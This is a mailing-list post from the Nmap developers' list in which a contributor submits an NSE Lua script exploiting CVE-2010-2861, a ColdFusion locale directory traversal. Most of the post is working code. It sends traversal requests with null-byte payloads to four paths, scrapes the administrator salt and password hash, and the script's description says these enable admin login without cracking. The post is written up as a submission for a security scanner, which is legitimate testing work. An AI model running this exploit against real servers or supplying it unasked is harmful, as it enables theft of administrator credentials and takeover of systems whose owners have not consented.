Nmap Development mailing list archives
CVE-2010-2861 - NSE for ColdFusion locale Directory Traversal Submission
From: Micah <micah.hoffman () gmail com>
Date: Fri, 10 Feb 2012 16:34:53 -0500
First time poster here. I created an NSE for the CVE-2010-2861 ColdFusion locale dir traversal. It takes an IP and port and will look (if it is HTTP/HTTPS) for the 4 locations where the password.properties file could be. It'll return the salt and password hash both scraped from the response page. This is my first NSE attempt and I'm sure that the code can be optimized, but it does work. There was 1 more step I wanted to take with this but could not: to use this information you need to get the SHA1 HMAC by using the salt (retrieved from the page) and the hash (also in the page). It is this HMAC that authenticates you to the server. I couldn't find a way to get this. Wanted to submit it for inclusion in nmap's scripts but couldn't find a submission form or anything. Hoping that posting it here gets it closer to being included. --- Micah ------------------------------------------------------ http-coldfusion-dir-traversal.nse description = [[ This script will execute a directory traversal attack against a ColdFusion server and try to grab the password hash for the administrator user. Using this information and a little web proxying, you can log into the ColdFusion server as the administrator without cracking the password hash. For more information on this vulnerability see: * http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2861 ]] --- -- @usage -- nmap --script http-coldfusion-dir-traversal -p80,443 <target> -- -- @output -- 80/tcp open http -- | http-coldfusion-dir-traversal: -- | CFusionMX -> SUCCESS - Salt: 1111111111111, Hash: AB3717200CD629BE34926297D9A0E87C7B0E7761 -- | CFusionMX7 -> SUCCESS - Salt: 2222222222222, Hash: 0976A887B98C87E545D3A56F8F87D88E8E0A0980 -- | ColdFusion8 -> SUCCESS - Salt: 3333333333333, Hash: A43A778B89C09D09E0F776A897F0976534356500 -- |_ JRun4\servers -> SUCCESS - alt: 44444444444444 Hash: 0976A887B98C87E545D3A56F8F87D88E8E0A0980 author = "Micah Hoffman" license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"intrusive", "safe"} require("http") require("shortport") require("stdnse") portrule = shortport.http action = function(host, port) local finalout = "" local cf6 = "" local cf7 = "" local cf8 = "" local cfall = "" -- Function to do the look up and return content local grabAndGrep = function(page) local saltcontent = "" local hashcontent = "" -- Do the HTTP GET request for the page local response = http.get(host, port, page) -- Check to see if we get a good page returned -- Is there no response? if not response.status then return "No response" end -- Is the response not an HTTP 200 code? if response.status ~= 200 then return "HTTP response code not 200" end -- Now check the body for our strings if response.body then saltcontent = response.body:match("salt.*value=\"(%d+)") hashcontent = response.body:match("password=([A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9][A-F0-9]+)") -- If a page has both the salt and the password in it then your exploit has been successful if saltcontent and hashcontent then return string.format("SUCCESS - Salt: %s, Hash: %s", saltcontent, hashcontent) else return "Not vuln" end end end --ColdFusion 6 Location cf6=grabAndGrep('/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties\%00en') --ColdFusion 7 Location cf7=grabAndGrep('/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties\%00en') --ColdFusion 8 Location cf8=grabAndGrep('/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties\%00en') --All ColdFusion Versions cfall=grabAndGrep('/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties\%00en') final_out = "\n CFusionMX -> " .. cf6 .. "\n CFusionMX7 -> " .. cf7 .. "\n ColdFusion8 -> " .. cf8 .. "\n JRun4\\servers -> " .. cfall return final_out end _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- CVE-2010-2861 - NSE for ColdFusion locale Directory Traversal Submission Micah (Feb 10)
- Re: CVE-2010-2861 - NSE for ColdFusion locale Directory Traversal Submission Patrik Karlsson (Feb 16)
- Message not available
- Message not available
- Re: CVE-2010-2861 - NSE for ColdFusion locale Directory Traversal Submission Patrik Karlsson (Feb 16)
- Message not available
- Re: CVE-2010-2861 - NSE for ColdFusion locale Directory Traversal Submission Patrik Karlsson (Feb 16)